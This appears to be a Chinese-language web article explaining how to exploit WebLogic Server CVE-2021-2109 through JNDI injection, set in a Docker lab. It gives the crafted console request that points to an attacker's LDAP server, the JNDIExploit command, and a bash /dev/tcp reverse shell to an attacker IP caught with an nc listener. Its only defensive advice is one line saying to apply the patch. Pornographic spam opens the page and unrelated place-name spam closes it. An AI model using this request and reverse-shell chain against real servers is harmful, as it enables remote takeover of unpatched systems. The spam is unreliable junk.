91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

發布時間:2021-12-28 20:16:22 來源:億速云 閱讀:117 作者:柒染 欄目:安全技術

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

一、漏洞描述

2021年1月20日,Oracle官方發布了漏洞補丁,修了包括 CVE-2021-2109 Weblogic Server遠程代碼執行漏洞在內的多個高危嚴重漏洞。CVE-2021-2109 中,攻擊者可構造惡意請求,造成JNDI注入,執行任意代碼,從而控制服務器

影響版本

  1. WebLogic 3.6.0.0

  2. WebLogic 1.3.0.0

  3. WebLogic 2.1.3.0

  4. WebLogic 2.1.4.0

  5. WebLogic 1.1.0.0

環境搭建

攻擊機(kali):192.168.159.131  靶機:192.168.159.139

這里使用docker來搭建環境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

訪問http://your-ip:49163/console即可看到頁面

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

漏洞復現

使用burpsuit截取訪問http://your-ip:49163/console報文,發送到repeater模塊

1、將GET /console/console.portal?_nfpb=true HTTP/1.1修改為POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.159;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

請注意192.168.159;131地址的第三位后面為分號,192.168.159;131為啟動LDAP服務的攻擊機IP

2、在cookie上方添加“cmd:id”來獲取靶機服務器id信息,如下圖所示

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

3、在攻擊機上啟動LDAP

下載地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.159.131

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

4、重放修改過的報文,成功獲取到靶機上的id信息

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

5、反彈shell

在http://www.jackson-t.ca/runtime-exec-payloads.html網站將bash -i >& /dev/tcp/192.168.159.131/2333 0>&1 進行base64編碼

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

將編碼后的反彈shell命令復制到下圖cmd后面進行重放,同時在攻擊機上開啟nc –lvvp 2333命令監聽2333端口,點擊發送

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

成功反彈回shell

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

修復建議

升級官方安全補丁

看完上述內容,你們掌握如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

佛冈县| 海安县| 东兰县| 昆山市| 博野县| 马山县| 喜德县| 手游| 叙永县| 康乐县| 正安县| 巴东县| 西乌珠穆沁旗| 子洲县| 贵溪市| 罗平县| 淄博市| 南岸区| 大同市| 新邵县| 阿瓦提县| 蓬溪县| 右玉县| 苏尼特左旗| 新宾| 天津市| 东阿县| 石门县| 四会市| 河池市| 温州市| 久治县| 赤水市| 汉源县| 鞍山市| 和政县| 明光市| 离岛区| 兰考县| 军事| 峡江县|